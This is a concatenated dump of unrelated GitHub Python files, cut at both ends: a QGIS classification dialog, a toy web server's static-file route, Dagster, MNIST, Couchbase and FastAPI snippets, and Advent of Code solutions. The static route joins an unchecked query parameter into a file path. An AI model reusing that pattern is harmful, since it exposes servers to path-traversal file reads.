CategoryFieldSelectionDialog.openLayerPropertiesDialog(layer=layer, parent=self)\r\n self.uiType1VectorClassification_.setLayer(layer=None)\r\n self.uiType1VectorClassification_.setLayer(layer=layer)\r\n\r\n def clearTrainingData(self):\r\n self.uiType0Raster_.setLayer(None)\r\n self.uiType0Classification_.setLayer(None)\r\n self.uiType1Raster_.setLayer(None)\r\n self.uiType1VectorClassification_.setLayer(None)\r\n self.uiType2Library_.setLayer(None)\r\n\r\n def initMaps(self):\r\n self.uiType0Raster_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType0Classification_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType1Raster_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType1VectorClassification_.setFilters(QgsMapLayerProxyModel.VectorLayer)\r\n self.uiType2Library_.setFilters(QgsMapLayerProxyModel.VectorLayer)\r\n self.uiRaster2_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n\r\n def progressBar(self):\r\n return ProgressBar(bar=self.uiProgressBar())\r\n\r\n def log(self, text):\r\n self.uiInfo_.setText(str(text))\r\n QCoreApplication.processEvents()\r\n\r\n def uiProgressBar(self):\r\n obj = self.uiProgressBar_\r\n assert isinstance(obj, QProgressBar)\r\n return obj\r\n\r\n def pickClassColor(self):\r\n w = self.sender()\r\n color = QColorDialog.getColor()\r\n if color.name() != '#000000':\r\n w.setStyleSheet('background-color: {}'.format(color.name()))\r\n\r\n def keyPressEvent(self, event):\r\n super().keyPressEvent(event)\r\n if event.key() == Qt.Key_F1:\r\n self.onAdvancedClicked()\r\n\r\n def updateSpinboxes(self, *args):\r\n self.log('')\r\n\r\n if self.uiSampeMode_.currentText() == 'Percent':\r\n value = float(self.uiSampleSizePercent_.value())\r\n else:\r\n value = float(self.uiSampleSizePixel_.value())\r\n\r\n for spinbox, count in zip(self.spinboxes, self.counts):\r\n if self.uiSampeMode_.currentText() == 'Percent':\r\n spinbox.setValue(int(round(count * value / 100.)))\r\n else:\r\n spinbox.setValue(int(value))\r\n\r\n def filenameTmpClassification(self):\r\n return '/vsimem/classification_workflow/classification.bsq'\r\n\r\n def filenameTmpRaster(self):\r\n return '/vsimem/classification_workflow/raster.bsq'\r\n\r\n def initClasses(self, *args):\r\n self.log('')\r\n self.spinboxes = None\r\n self.uiStacked_.setEnabled(False)\r\n self.widget_.hide()\r\n self.widget_ = QWidget()\r\n self.layout_.addWidget(self.widget_)\r\n layout = QHBoxLayout(self.widget_)\r\n self.updateTotalSamples()\r\n\r\n if self.uiTrainingType_.currentIndex() == 0: # raster\r\n rasterLayer: QgsRasterLayer = self.uiType0Raster_.currentLayer()\r\n classificationLayer: QgsRasterLayer = self.uiType0Classification_.currentLayer()\r\n if rasterLayer is None or classificationLayer is None:\r\n return\r\n\r\n if not isinstance(classificationLayer.renderer(), QgsPalettedRasterRenderer):\r\n self.log('Selected layer is not a valid classification (requires Paletted/Unique values renderer).')\r\n self.uiType0Classification_.setLayer(None)\r\n return\r\n\r\n saveLayerAsClassification(\r\n qgsMapLayer=classificationLayer,\r\n filename=self.filenameTmpClassification()\r\n )\r\n\r\n classification = Classification(filename=self.filenameTmpClassification())\r\n elif self.uiTrainingType_.currentIndex() == 1: # vector\r\n rasterLayer: QgsRasterLayer = self.uiType1Raster_.currentLayer()\r\n vectorClassificationLayer: QgsVectorLayer = self.uiType1VectorClassification_.currentLayer()\r\n if rasterLayer is None or vectorClassificationLayer is None:\r\n return\r\n\r\n if not isinstance(vectorClassificationLayer.renderer(), QgsCategorizedSymbolRenderer):\r\n\r\n dlg = CategoryFieldSelectionDialog(layer=vectorClassificationLayer, parent=self)\r\n if dlg.exec_():\r\n fieldName = dlg.field.currentField()\r\n fields: QgsFields = vectorClassificationLayer.fields()\r\n fieldIndex = fields.indexFromName(fieldName)\r\n uniqueValues = vectorClassificationLayer.uniqueValues(fieldIndex)\r\n categories = list()\r\n for value in uniqueValues:\r\n name = str(value)\r\n color = HubdsmColor.fromRandom()\r\n color = QColor(color.red, color.green, color.blue).name()\r\n symbol = QgsMarkerSymbol.createSimple(\r\n {'color': color, 'size': '2', 'outline_color': 'black'})\r\n categories.append(QgsRendererCategory(value, symbol, name, True))\r\n renderer = QgsCategorizedSymbolRenderer(fieldName, categories)\r\n vectorClassificationLayer.setRenderer(renderer)\r\n\r\n if dlg.checkBox.isChecked():\r\n CategoryFieldSelectionDialog.openLayerPropertiesDialog(\r\n layer=vectorClassificationLayer, parent=self\r\n )\r\n\r\n else:\r\n self.uiType1VectorClassification_.setLayer(None)\r\n return\r\n\r\n raster = Raster(filename=self.uiType1Raster_.currentLayer().source())\r\n\r\n if not raster.dataset().projection().equal(\r\n Vector(filename=vectorClassificationLayer.source()).dataset().projection()\r\n ):\r\n self.log('Projection mismatch between Raster and Vector Classification.')\r\n return\r\n\r\n self.log('Rasterize vector classification on raster grid')\r\n saveLayerAsClassification(\r\n qgsMapLayer=vectorClassificationLayer,\r\n grid=GdalRaster.open(raster.filename()).grid,\r\n filename=self.filenameTmpClassification()\r\n )\r\n self.log('')\r\n\r\n classification = Classification(filename=self.filenameTmpClassification())\r\n self.progressBar().setPercentage(0)\r\n\r\n elif self.uiTrainingType_.currentIndex() == 2: # speclib\r\n libraryLayer: QgsVectorLayer = self.uiType2Library_.currentLayer()\r\n if libraryLayer is None:\r\n return\r\n\r\n try:\r\n renderer = libraryLayer.renderer().clone()\r\n libraryLayer = QgsVectorLayer(baseName=libraryLayer.name(), path=libraryLayer.source())\r\n libraryLayer.setRenderer(renderer)\r\n except:\r\n self.uiType2Library_.setLayer(None)\r\n self.log('Selected layer is not a valid library.')\r\n return\r\n\r\n assert is_spectral_library(libraryLayer)\r\n\r\n if not isinstance(libraryLayer.renderer(), QgsCategorizedSymbolRenderer):\r\n self.uiType2Library_.setLayer(None)\r\n self.log('Selected layer is not a valid library classification (requires Categorized renderer).')\r\n return\r\n\r\n qgsVectorClassificationScheme = QgsVectorClassificationScheme.fromQgsVectorLayer(\r\n qgsVectorLayer=libraryLayer\r\n )\r\n\r\n # make pseudo raster\r\n X = list()\r\n y = list()\r\n fieldIndex = None\r\n for profile in libraryLayer:\r\n if fieldIndex is None:\r\n fieldIndex = profile.fieldNames().index(qgsVectorClassificationScheme.classAttribute)\r\n label = profile.attribute(fieldIndex)\r\n if label not in qgsVectorClassificationScheme.categories:\r\n continue\r\n category = qgsVectorClassificationScheme.categories[label]\r\n y.append(category.id)\r\n X.append(profile.values()['y'])\r\n X = np.array(X, dtype=np.float64)\r\n y = np.array(y)\r\n raster = Raster.fromArray(\r\n array=np.atleast_3d(X.T),\r\n filename=self.filenameTmpRaster()\r\n )\r\n classification = GdalRaster.createFromArray(\r\n array=np.atleast_3d(y),\r\n filename=self.filenameTmpClassification()\r\n )\r\n classification.setCategories(list(qgsVectorClassificationScheme.categories.values()))\r\n del classification\r\n classification = Classification(self.filenameTmpClassification())\r\n else:\r\n assert 0\r\n\r\n counts = classification.statistics()\r\n self.counts = counts\r\n\r\n self.spinboxes = list()\r\n self.colors = list()\r\n self.names = list()\r\n\r\n for i in range(classification.classDefinition().classes()):\r\n\r\n layout1 = QVBoxLayout()\r\n layout2 = QHBoxLayout()\r\n color = QToolButton()\r\n color.setStyleSheet(\r\n 'background-color: {}'.format(classification.classDefinition().color(i + 1)._qColor.name()))\r\n color.setMaximumWidth(25)\r\n color.setMaximumHeight(18)\r\n\r\n color.setAutoRaise(True)\r\n color.clicked.connect(self.pickClassColor)\r\n self.colors.append(color)\r\n layout2.addWidget(color)\r\n layout2.addWidget(QLabel('{}:'.format(i + 1)))\r\n name = QLineEdit(classification.classDefinition().name(i + 1))\r\n text = name.text()\r\n fm = name.fontMetrics()\r\n w = fm.boundingRect(text).width()\r\n name.resize(w, name.height())\r\n name.setMinimumWidth(w + 10)\r\n layout2.addWidget(name)\r\n # layout2.addWidget(QLabel('({} px) '.format(counts[i])))\r\n self.names.append(name)\r\n layout1.addLayout(layout2)\r\n\r\n # layout3 = QHBoxLayout()\r\n spinbox = QSpinBox()\r\n spinbox.setRange(0, counts[i])\r\n spinbox.setSingleStep(1)\r\n spinbox.setValue(counts[i])\r\n spinbox.setSuffix(' ({} px)'.format(counts[i]))\r\n spinbox.valueChanged.connect(self.updateTotalSamples)\r\n self.spinboxes.append(spinbox)\r\n layout1.addWidget(spinbox)\r\n # layout3.addWidget(QLabel('({} px) '.format(counts[i])))\r\n # layout1.addLayout(layout3)\r\n\r\n layout.addLayout(layout1)\r\n\r\n self.updateTotalSamples()\r\n\r\n # self.widget_.adjustSize()\r\n # self.adjustSize()\r\n\r\n self.uiStacked_.setEnabled(True)\r\n\r\n def updateTotalSamples(self, *args):\r\n total = 0\r\n if self.spinboxes is not None:\r\n for spinbox in self.spinboxes:\r\n total += int(spinbox.value())\r\n self.uiTotalSampleSize_.setText('Total sample size = {}'.format(total))\r\n\r\n def initClassifier(self):\r\n from _classic.enmapboxgeoalgorithms.algorithms import ALGORITHMS, ClassifierFit\r\n self.classifiers = [alg for alg in ALGORITHMS if isinstance(alg, ClassifierFit)]\r\n self.classifierNames = [alg.name()[3:] for alg in self.classifiers]\r\n self.uiClassifier_.addItems(self.classifierNames)\r\n self.uiClassifier_.currentIndexChanged.connect(\r\n lambda index: self.uiCode_.setText(self.classifiers[index].code()))\r\n self.uiClassifier_.setCurrentIndex(self.classifierNames.index('RandomForestClassifier'))\r\n\r\n def initOutputs(self):\r\n outdir = tempfile.gettempdir()\r\n self.uiSampledClassificationFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiModelFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiClassificationFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiProbabilityFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiReportFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiSampledClassificationFilename_.setFilePath(join(outdir, 'sample.bsq'))\r\n self.uiModelFilename_.setFilePath(join(outdir, 'classifier.pkl'))\r\n self.uiClassificationFilename_.setFilePath(join(outdir, 'classification.bsq'))\r\n self.uiProbabilityFilename_.setFilePath(join(outdir, 'probability.bsq'))\r\n self.uiReportFilename_.setFilePath(join(outdir, 'accass.html'))\r\n\r\n def execute(self, *args):\r\n self.log('')\r\n\r\n try:\r\n saveSampledClassification = self.uiSampledClassificationFilename_.isEnabled()\r\n saveSampledClassificationComplement = saveSampledClassification # self.uiSampledClassificationComplementFilename_.isEnabled()\r\n saveModel = self.uiModelFilename_.isEnabled()\r\n saveClassification = self.uiClassificationFilename_.isEnabled()\r\n saveProbability = self.uiProbabilityFilename_.isEnabled()\r\n saveRGB = self.uiRGB_.isEnabled()\r\n saveReport = self.uiReportFilename_.isEnabled()\r\n filenameSampledClassification = self.uiSampledClassificationFilename_.filePath()\r\n filenameSampledClassificationComplement = '{}_complement{}'.format(\r\n *splitext(filenameSampledClassification)\r\n )\r\n filenameModel = self.uiModelFilename_.filePath()\r\n filenameClassification = self.uiClassificationFilename_.filePath()\r\n filenameProbability = self.uiProbabilityFilename_.filePath()\r\n filenameReport = self.uiReportFilename_.filePath()\r\n\r\n if self.uiTrainingType_.currentIndex() == 0: # raster\r\n qgsRaster = self.uiType0Raster_.currentLayer()\r\n qgsClassification = self.uiType0Classification_.currentLayer()\r\n if qgsRaster is None:\r\n self.log('Error: no raster selected')\r\n return\r\n if qgsClassification is None:\r\n self.log('Error: no classification selected')\r\n return\r\n raster = Raster(filename=qgsRaster.source())\r\n elif self.uiTrainingType_.currentIndex() == 1: # vector\r\n qgsRaster = self.uiType1Raster_.currentLayer()\r\n qgsClassification = self.uiType1VectorClassification_.currentLayer()\r\n if qgsRaster is None:\r\n self.log('Error: no raster selected')\r\n return\r\n if qgsClassification is None:\r\n self.log('Error: no classification selected')\r\n return\r\n raster = Raster(filename=qgsRaster.source())\r\n elif self.uiTrainingType_.currentIndex() == 2: # speclib\r\n raster = Raster(filename=self.filenameTmpRaster())\r\n else:\r\n assert 0\r\n\r\n colors = list()\r\n for w in self.colors:\r\n hex = w.styleSheet().split(' ')[1]\r\n colors.append(Color(hex))\r\n\r\n names = list()\r\n for w in self.names:\r\n names.append(w.text())\r\n\r\n classDefinition = ClassDefinition(names=names, colors=colors)\r\n\r\n classification = Classification(filename=self.filenameTmpClassification(), classDefinition=classDefinition)\r\n\r\n #if not raster.grid().equal(other=classification.grid()):\r\n # self.log('Error: raster and reference grids do not match')\r\n # return\r\n\r\n sample = ClassificationSample(raster=raster, classification=classification)\r\n\r\n qgsRaster2 = self.uiRaster2_.currentLayer()\r\n if (saveClassification or saveProbability) and (qgsRaster2 is None):\r\n self.log('Error: no raster for mapping selected')\r\n return\r\n raster2 = Raster(filename=qgsRaster2.source())\r\n\r\n qgsMask2 = self.uiMask_.currentLayer()\r\n if isinstance(qgsMask2, QgsRasterLayer):\r\n mask2 = Mask(filename=qgsMask2.source())\r\n if not raster.grid().equal(other=mask2.grid()):\r\n self.log('Error: raster and mask grids do not match')\r\n return\r\n elif isinstance(qgsMask2, QgsVectorLayer):\r\n mask2 = VectorMask(filename=qgsMask2.source())\r\n elif qgsMask2 is None:\r\n mask2 = None\r\n else:\r\n assert 0\r\n\r\n n = [spinbox.value() for spinbox in self.spinboxes]\r\n if np.sum(n) == np.sum(self.counts): # perform no random sampling if all samples are used\r\n n = None\r\n\r\n cv = self.uiNFold_.value()\r\n\r\n namespace = dict()\r\n code = self.uiCode_.toPlainText()\r\n exec(code, namespace)\r\n sklEstimator = namespace['estimator']\r\n classifier = Classifier(sklEstimator=sklEstimator)\r\n\r\n self.uiExecute_.setEnabled(False)\r\n\r\n classificationWorkflow(sample=sample,\r\n classifier=classifier,\r\n raster=raster2,\r\n mask=mask2,\r\n n=n,\r\n cv=cv,\r\n saveSampledClassification=saveSampledClassification,\r\n saveSampledClassificationComplement=saveSampledClassificationComplement,\r\n saveModel=saveModel,\r\n saveClassification=saveClassification,\r\n saveProbability=saveProbability,\r\n saveRGB=saveRGB,\r\n saveReport=saveReport,\r\n filenameSampledClassification=filenameSampledClassification,\r\n filenameSampledClassificationComplement=filenameSampledClassificationComplement,\r\n filenameModel=filenameModel,\r\n filenameClassification=filenameClassification,\r\n filenameProbability=filenameProbability,\r\n filenameReport=filenameReport,\r\n ui=self)\r\n self.log('Done!')\r\n self.progressBar().setPercentage(0)\r\n self.uiExecute_.setEnabled(True)\r\n\r\n\r\n except Exception as error:\r\n traceback.print_exc()\r\n self.log('Error: {}'.format(str(error)))\r\n self.uiExecute_.setEnabled(True)\r\n\r\n\r\nclass CategoryFieldSelectionDialog(QDialog):\r\n\r\n def __init__(self, layer: QgsVectorLayer, *args, **kwargs):\r\n super(CategoryFieldSelectionDialog, self).__init__(*args, **kwargs)\r\n self.setWindowTitle('Invalid Vector Classification')\r\n self.layer = layer\r\n\r\n QBtn = QDialogButtonBox.Ok | QDialogButtonBox.Cancel\r\n self.buttonBox = QDialogButtonBox(QBtn)\r\n self.buttonBox.accepted.connect(self.accept)\r\n self.buttonBox.rejected.connect(self.reject)\r\n self.field = QgsFieldComboBox()\r\n self.field.setLayer(layer=layer)\r\n self.field.setCurrentIndex(0)\r\n self.field.setAllowEmptyFieldName(False)\r\n self.checkBox = QCheckBox('Open layer styling dialog for changing class names and colors?')\r\n self.checkBox.setChecked(True)\r\n self.layout = QVBoxLayout()\r\n self.layout.addWidget(QLabel('Selected layer is not a well defined vector classification.'))\r\n self.layout.addWidget(QLabel('This can be fixed by changing the layer styling to categorized rendering.'))\r\n self.layout.addWidget(QLabel(''))\r\n self.layout.addWidget(QLabel('Please select a value field used for categorization.'))\r\n self.layout.addWidget(self.field)\r\n self.layout.addWidget(self.checkBox)\r\n self.layout.addWidget(self.buttonBox)\r\n self.setLayout(self.layout)\r\n self.resize(300, 50)\r\n\r\n @staticmethod\r\n def openLayerPropertiesDialog(layer: QgsVectorLayer, parent: QWidget):\r\n from enmapbox.qgispluginsupport.qps.layerproperties import showLayerPropertiesDialog\r\n dialog = showLayerPropertiesDialog(layer, parent=parent, modal=False)\r\n dialog.mOptionsListWidget.setCurrentRow(2)\r\n dialog.setModal(True)\r\n dialog.exec_()\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapbox/coreapps/_classic/classificationapp/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":22485,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"22291571387","text":"def static(request):\n \"\"\"\n 静态资源的处理函数, 读取静态文件并生成响应返回\n \"\"\"\n filename = request.query.get('file')\n path = 'static/' + filename\n with open(path, 'rb') as f:\n header = b'HTTP/1.1 200 OK\\r\\n\\r\\n'\n r = header + f.read()\n return r\n\n\n# 路由字典\n# key 是路由(路由就是 path)\n# value 是路由处理函数(就是响应)\nroute_dict = {\n '/static': static,\n}","repo_name":"realRichard/TodoList","sub_path":"routes/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28885385471","text":"'''\nThis demo example is to demonstrate that it is possible to construct\nthe dependencies of a pipeline definition from a yaml file or similar.\nThis is not the \"blessed\" file format nor is it our recommendation for\ndoing things. However we've been asked a number of times if this is possible\nand this should serve as a reasonable template to build upon. \n'''\nfrom dagster import (\n DependencyDefinition,\n PipelineDefinition,\n SolidInvocation,\n check,\n file_relative_path,\n solid,\n)\nfrom dagster.utils import load_yaml_from_path\n\n\n@solid\ndef add_one(_, num: int) -> int:\n return num + 1\n\n\n@solid\ndef add_two(_, num: int) -> int:\n return num + 2\n\n\n@solid\ndef add(_, left: int, right: int) -> int:\n return left + right\n\n\ndef construct_pipeline_with_yaml(yaml_file, solid_defs):\n yaml_data = load_yaml_from_path(yaml_file)\n solid_def_dict = {s.name: s for s in solid_defs}\n\n deps = {}\n\n for solid_yaml_data in yaml_data['pipeline']['solids']:\n check.invariant(solid_yaml_data['def'] in solid_def_dict)\n def_name = solid_yaml_data['def']\n alias = solid_yaml_data.get('alias', def_name)\n solid_deps_entry = {}\n for input_name, input_data in solid_yaml_data.get('deps', {}).items():\n solid_deps_entry[input_name] = DependencyDefinition(\n solid=input_data['solid'], output=input_data.get('output', 'result')\n )\n deps[SolidInvocation(name=def_name, alias=alias)] = solid_deps_entry\n\n return PipelineDefinition(\n name=yaml_data['pipeline']['name'],\n description=yaml_data['pipeline'].get('description'),\n solid_defs=solid_defs,\n dependencies=deps,\n )\n\n\ndef define_dep_dsl_pipeline():\n return construct_pipeline_with_yaml(\n file_relative_path(__file__, 'example.yaml'), [add_one, add_two, add]\n )\n","repo_name":"konradmalik/tech-sandbox","sub_path":"Dagster/data/airline-demo/dagster_examples/dep_dsl/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17766463969","text":"import numpy as np \nimport random\nimport pdb\nimport sys\nimport time\nimport os\n\nfrom ml_from_scratch.coursera.mnist import train_images as get_train_images\nfrom ml_from_scratch.coursera.mnist import train_labels as get_train_labels\nfrom ml_from_scratch.coursera.mnist import test_images as get_test_images\nfrom ml_from_scratch.coursera.mnist import test_labels as get_test_labels\n\ndef init_subset(id):\n\n #S = int(id) % 1000\n S = int(id) % 210\n \n ### Create a subset of MNIST dataset with only 4 classes\n num_classes = 4\n sub_idx = np.sort(np.random.RandomState(seed=S).permutation(10)[:4])\n train_sub_size = 500\n test_sub_size = 100\n train_images = get_train_images() #[60000, 28, 28]\n train_labels = get_train_labels()\n test_images = get_test_images()\n test_labels = get_test_labels()\n\n ### Preprocessing the data\n print('Preparing data......')\n train_images -= int(np.mean(train_images))\n train_images = train_images // int(np.std(train_images))\n test_images -= int(np.mean(test_images))\n test_images = test_images // int(np.std(test_images))\n \n #pdb.set_trace()\n training_data = train_images.reshape(60000, 1, 28, 28)\n testing_data = test_images.reshape(10000, 1, 28, 28)\n ### Generate the New subset of training and testing samples\n sub_training_images, sub_training_labels = subset_extraction(S, sub_idx, train_sub_size, training_data, train_labels, num_classes,train=True)\n sub_testing_images, sub_testing_labels = subset_extraction(S, sub_idx, test_sub_size, testing_data, test_labels, num_classes,train=False)\n return sub_training_images, sub_training_labels, sub_testing_images, sub_testing_labels\n \n### Function of creating the subset of MNIST dataset\ndef subset_extraction(S, idx, sub_size, images, labels, num_classes, train=True):\n temp_img = []\n temp_labels = []\n for i in range(num_classes):\n ind = labels == idx[i]\n A = images[ind,:,:,:]\n A = A[:sub_size,:,:,:]\n temp_img.append(A)\n label_list = [i] * A.shape[0]\n temp_labels += label_list\n\n sub_images = np.vstack(temp_img)\n sub_labels = np.asarray(temp_labels)\n # shuffle the subset samples\n shuffle_idx = np.random.RandomState(seed=S).permutation(sub_images.shape[0])\n final_images = sub_images[shuffle_idx,:,:]\n final_labels = sub_labels[shuffle_idx]\n final_labels = np.eye(num_classes)[final_labels]\n return final_images, final_labels\n\nif __name__ == \"__main__\":\n init_subset(\"9000\")\n","repo_name":"necromuralist/Machine-Learning-From-Scratch","sub_path":"ml_from_scratch/coursera/precode.py","file_name":"precode.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72895406886","text":"import asyncio\nimport selectors\n\n\nclass LoopValidator:\n REQUIRED_METHODS = {'add_reader', 'remove_reader',\n 'add_writer', 'remove_writer'}\n\n @staticmethod\n def _get_working_loop():\n evloop = asyncio.get_event_loop()\n gen_new_loop = not LoopValidator._is_valid_loop(evloop)\n if gen_new_loop:\n evloop.close()\n selector = selectors.SelectSelector()\n new_loop = asyncio.SelectorEventLoop(selector)\n asyncio.set_event_loop(new_loop)\n return new_loop\n\n return evloop\n\n @staticmethod\n def _is_valid_loop(evloop):\n if not evloop:\n return False\n for meth in LoopValidator.REQUIRED_METHODS:\n abs_meth, actual_meth = (\n getattr(asyncio.AbstractEventLoop, meth), getattr(evloop.__class__, meth))\n if abs_meth == actual_meth:\n return False\n return True\n\n @staticmethod\n def get_event_loop(evloop):\n if LoopValidator._is_valid_loop(evloop):\n return evloop\n return LoopValidator._get_working_loop()\n\n @staticmethod\n def close_loop():\n evloop = asyncio.get_event_loop()\n evloop.close()\n\n\ndef get_event_loop(\n evloop=None, # type: asyncio.AbstractEventLoop\n):\n \"\"\"\n Get an event loop compatible with acouchbase.\n Some Event loops, such as ProactorEventLoop (the default asyncio event\n loop for Python 3.8 on Windows) are not compatible with acouchbase as\n they don't implement all members in the abstract base class.\n\n :param evloop: preferred event loop\n :return: The preferred event loop, if compatible, otherwise, a compatible\n alternative event loop.\n \"\"\"\n return LoopValidator.get_event_loop(evloop)\n","repo_name":"couchbase/couchbase-python-client","sub_path":"acouchbase/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"52"} +{"seq_id":"7179272258","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom fastadmin.system.api import users\nfrom fastadmin.system.schemas import Response,UsersCreate,Users\nfrom fastadmin.system.database import SessionLocal\nfrom fastadmin.utils.common.resp import respSuccessJson\n\n# Dependency\ndef get_db():\n \"\"\"\n 每一个请求处理完毕后会关闭当前连接,不同的请求使用不同的连接\n :return:\n \"\"\"\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\nrouter = APIRouter()\n\nrouter = APIRouter(\n prefix=\"/users\", # 前缀只在这个模块中使用\n tags=[\"users\"],\n)\n\n@router.post(\"/create\",response_model = Response[Users])\nasync def create_user(user: UsersCreate, db: Session = Depends(get_db)):\n return respSuccessJson(users.db_create_user(db,user))\n\n@router.get(\"/users/me\")\nasync def read_user_me():\n return {\"username\": \"zhangsan\"}","repo_name":"kejian-xu/fastadmin","sub_path":"fastadmin/system/router/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73414909284","text":"import matplotlib.pyplot as plt \nimport glob \nimport os\n\n# files = glob.glob('C:\\研究室\\みんなのアイデア\\予備実験結果\\*')\n\npath = 'C:\\研究室\\みんなのアイデア\\内藤洗濯機1203.txt'\nwords = []\n\nwith open(path, encoding='utf_8') as file:\n index = 0\n for s in file:\n line = str(index)+' '+s\n words.append(line)\n index += 1\n print(s)\n # line = list(s.strip().split())\n # if len(line) == 1:\n # continue\n # line.insert(0,str(index))\n # line.append('\\n')\n # words.append(line)\n # index += 1\n# print(words)\nwith open(path,'a',encoding='utf_8') as file:\n for i in range(len(words)):\n if i == 0:\n continue\n file.write(words[i])\n\n","repo_name":"yamayamaKo/python_lab","sub_path":"フォーマットを整える.py","file_name":"フォーマットを整える.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35831344665","text":"import argparse\nfrom apitep_utils import ETL, ArgumentParserHelper\nimport logging\n\nimport keys\nfrom data_model.school_kind import SchoolKind\n\nlog = logging.getLogger(__name__)\n\n\nclass DataAcquisitionDV(ETL):\n school_kind: SchoolKind = None\n\n def parse_arguments(self):\n \"\"\"\n Parse arguments provided via command line, and check if they are valid\n or not. Adequate defaults are provided when possible.\n\n Parsed arguments are:\n - paths to the input CSV datasets, separated with spaces.\n - path to the output CSV dataset.\n \"\"\"\n\n log.info(\"Get integration arguments\")\n log.debug(\"Integration.parse_arguments()\")\n\n program_description = self.description\n argument_parser = argparse.ArgumentParser(description=program_description)\n argument_parser.add_argument(\"-i\", \"--input_paths\",\n required=True,\n nargs=\"+\",\n help=\"path to the input CSV datasets\")\n argument_parser.add_argument(\"-o\", \"--output_path\", required=True,\n help=\"path to the output CSV dataset\")\n argument_parser.add_argument(\"-s\", \"--school_kind\", required=True,\n help=\"school kind to analyze\")\n\n arguments = argument_parser.parse_args()\n input_path_segments = arguments.input_paths\n self.input_path_segments = []\n for input_path_segment in input_path_segments:\n self.input_path_segments.append(\n ArgumentParserHelper.parse_data_file_path(\n data_file_path=input_path_segment)\n )\n self.output_path_segment = ArgumentParserHelper.parse_data_file_path(\n data_file_path=arguments.output_path,\n check_is_file=False)\n school_kind_str = arguments.school_kind\n if school_kind_str == \"Teaching\":\n self.school_kind = SchoolKind.Teaching\n elif school_kind_str == \"Polytechnic\":\n self.school_kind = SchoolKind.Polytechnic\n\n @ETL.stopwatch\n def process(self):\n \"\"\"\n Process record personal data\n \"\"\"\n log.info(\"Data acquisition of record_personal_access data for data visualization of school: \" +\n self.school_kind.value)\n log.debug(\"DataAcquisitionDV.process()\")\n\n target_courses = ['2015-16', '2016-17', '2017-18', '2018-19', '2019-20', '2020-21']\n\n rows_before = len(self.input_dfs[0].index)\n self.input_dfs[0] = self.input_dfs[0][self.input_dfs[0][keys.OPEN_YEAR_PLAN_KEY].isin(target_courses)]\n rows_after = len(self.input_dfs[0].index)\n self.changes[\"get only target courses for visualization\"] = rows_before - rows_after\n\n log.info(\"columns of final dataset are:\" + str(self.input_dfs[0].columns))\n log.info(\"final number of rows: \" + str(len(self.input_dfs[0].index)))\n self.output_df = self.input_dfs[0]\n\n\ndef main():\n logging.basicConfig(\n filename=\"debug.log\",\n level=logging.DEBUG,\n format=\"%(asctime)-15s %(levelname)8s %(name)s %(message)s\")\n logging.getLogger(\"matplotlib\").setLevel(logging.ERROR)\n\n log.info(\"--------------------------------------------------------------------------------------\")\n log.info(\"Start DataAcquisitionDV\")\n log.debug(\"main()\")\n\n etl = DataAcquisitionDV(\n input_separator=\"|\",\n output_separator=\"|\",\n save_report_on_save=False,\n save_report_on_load=False,\n )\n etl.execute()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"franjmelchor/education_drop","sub_path":"Code/Data_Visualization/Data_Acquisition/dv_data_acquisition.py","file_name":"dv_data_acquisition.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28251419717","text":"import os\n\n\ndef part_1(input):\n total = 0\n for value in input:\n total += int(value / 3) - 2\n return total\n\n\ndef part_2(input):\n total = 0\n for value in input:\n while value > 0:\n value = int(value / 3) - 2\n if value > 0:\n total += value\n return total\n\n\nif __name__ == \"__main__\":\n filename = os.path.splitext(os.path.dirname(__file__))[\n 0] + 'inputs/01.in'\n input = open(filename).readlines()\n int_list = [int(x) for x in input]\n print(\"part 1: \", part_1(int_list))\n print(\"part 2: \", part_2(int_list))\n","repo_name":"jcockbain/advent-of-code-17-19","sub_path":"2019/day_01.py","file_name":"day_01.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71034769764","text":"\"\"\"--- Day 7: No Space Left On Device ---\r\nYou can hear birds chirping and raindrops hitting leaves as the expedition proceeds. Occasionally, you can even hear much louder sounds in the distance; how big do the animals get out here, anyway?\r\n\r\nThe device the Elves gave you has problems with more than just its communication system. You try to run a system update:\r\n\r\n$ system-update --please --pretty-please-with-sugar-on-top\r\nError: No space left on device\r\nPerhaps you can delete some files to make space for the update?\r\n\r\nYou browse around the filesystem to assess the situation and save the resulting terminal output (your puzzle input). For example:\r\n\r\n$ cd /\r\n$ ls\r\ndir a\r\n14848514 b.txt\r\n8504156 c.dat\r\ndir d\r\n$ cd a\r\n$ ls\r\ndir e\r\n29116 f\r\n2557 g\r\n62596 h.lst\r\n$ cd e\r\n$ ls\r\n584 i\r\n$ cd 